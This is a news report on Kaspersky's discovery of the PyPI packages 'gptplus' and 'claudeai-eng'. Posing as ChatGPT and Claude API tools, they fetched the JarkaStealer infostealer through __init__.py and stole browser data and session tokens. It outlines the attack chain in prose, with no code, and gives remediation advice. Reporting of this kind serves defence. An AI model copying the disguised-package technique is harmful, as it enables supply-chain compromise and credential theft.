Malicious packages on the Python Package Index (PyPI), claiming to provide API access to OpenAI’s ChatGPT and Anthropic’s Claude AI models, were discovered by Kaspersky researchers to contain the JarkaStealer infostealer malware, the cybersecurity company said in a blog post Thursday.
The packages, named “gptplus” and “claudeai-eng,” were both uploaded by a user called “Xeroline” in November 2023 and were each installed more than 1,700 times by users in more than 30 prior to their removal from PyPI, the researchers said.
A demo version of ChatGPT was included in the packages to make them appear as though they were providing the expected functionality, but in the background, the “__init__.py” file included in the package would download the Java archive “JavaUpdater.jar” from a GitHub repository.
This Java archive contained the JarkaStealer malware, a malware-as-a-service (MaaS) infostealer that is designed to collect system information, data from browsers including Google Chrome and Microsoft Edge, session tokens from applications like Telegram and Discord, and screenshots of the victim’s system.
The malware checks if Java is installed on the victim’s machine and installs the Java Runtime Environment (JRE) from Dropbox if needed. It then executes the stealer, which collects the victim’s information, archives it, transmits it to an attacker-controlled server and then deletes it from the victim’s system, the Kaspersky researchers explained.
While JarkaStealer’s creators sell it as a MaaS offering through Telegram, the malware’s source code has also been leaked on GitHub, the researchers noted. JarkaStealer does not have any persistence mechanisms and only launches when the gptplus or claudeai-eng packages are run, so users who may have installed the fake AI packages can safely remove them along with the stealer.
Users who believe they may have installed the malicious packages should also reset or reissue any passwords and session tokens that could have been compromised by JarkaStealer. The discovery of these packages highlights the risks to software supply chains posed by threat actor activity on open-source repositories like PyPI.
“We advise organizations to implement stringent verification and integrity checks to ensure the legitimacy and security of the software and dependencies they use, particularly when integrating exciting new technologies like AI,” Leonid Bezvershenko, security researcher at Kaspersky’s Global Research and Analysis Team (GReAT), said in a statement.
The packages were discovered by Kaspersky GReAT using its automated system for monitoring open-source repositories. The uploading of malicious packages disguised as legitimate tools is not uncommon on such repositories, with recent cases including the discovery of a PyPI package imitating the Fabric SSH automation library that was designed to steal AWS credentials, and the use of npm packages disguised as the Ethereum development utility Hardhat by North Korean threat actor Stressed Pungsan to compromise Windows systems.
